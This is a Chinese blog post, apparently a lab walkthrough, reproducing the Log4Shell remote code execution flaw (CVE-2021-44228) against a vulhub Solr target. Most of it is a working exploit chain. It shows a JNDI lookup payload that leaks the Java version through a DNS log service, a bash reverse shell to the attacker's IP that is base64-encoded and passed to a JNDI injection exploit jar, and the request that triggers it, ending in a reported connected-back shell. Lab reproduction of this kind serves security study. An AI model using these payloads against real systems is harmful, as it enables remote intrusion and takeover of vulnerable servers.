Apache Log4j 远程代码执行漏洞复现

(vulhub环境搭建+复现)CVE-2021-44228 Apache Log4j 远程代码执行漏洞

关于漏洞

漏洞编号: CVE-2021-44228,名称为Log4Shell或者LogJam

漏洞类型: Remote Code Execution (RCE)

组件名称: Apache log4j2

影响范围: 2.0.0 ≤ Apache Log4j2 ≤ 2.15.0-rc1

利用难度: 容易

威胁等级: 严重

漏洞环境搭建

靶机IPl192.168.50.134

cd vulhub/log4j/CVE-2021-44228
docker-compose up -d

漏洞复现

访问http://192.168.50.134:8983/solr/#/

图片[1]-Apache Log4j 远程代码执行漏洞复现-吾爱博客

POC

打开dnslog获取一个地址

构造

${jndi:ldap://${sys:java.version}.w5b7yq.dnslog.cn}

直接访问

http://192.168.50.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.w5b7yq.dnslog.cn}
图片[2]-Apache Log4j 远程代码执行漏洞复现-吾爱博客

查看dnslog的结果:

图片[3]-Apache Log4j 远程代码执行漏洞复现-吾爱博客
可以看到成功返回了java的版本

命令执行

构造连接参数

这里攻击机ip为192.168.50.129

bash -i >& /dev/tcp/192.168.50.129/6666 0>&1

base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS82NjY2IDA+JjE=

将bash编码的复制,然后运行漏洞利用的jar文件:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEyOS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.50.129"
图片[4]-Apache Log4j 远程代码执行漏洞复现-吾爱博客

执行攻击

http://192.168.50.134:8983/solr/admin/cores?action=${jndi:ldap://192.168.50.134:1099/1dj8mp}

成功反弹shell

图片[5]-Apache Log4j 远程代码执行漏洞复现-吾爱博客
© 版权声明
THE END
喜欢就支持以下吧
点赞0 分享
评论 抢沙发

请登录后发表评论